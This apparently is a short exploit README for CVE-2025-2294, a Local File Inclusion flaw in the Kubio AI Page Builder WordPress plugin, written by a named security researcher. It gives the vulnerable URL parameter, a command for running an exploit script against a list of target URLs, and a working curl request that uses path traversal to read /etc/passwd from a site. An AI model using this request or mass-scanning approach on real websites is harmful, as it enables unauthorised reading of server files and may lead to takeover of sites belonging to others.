
CVE-2025-2294 is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows unauthenticated remote attackers 👾 to include arbitrary files on the server via the __kubio-site-edit-iframe-classic-template URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.
Muhammad Nizar — Security Researcher 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
Feel free to reach out for questions or collaboration! 🤝
Run the exploit script with a list of target URLs:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"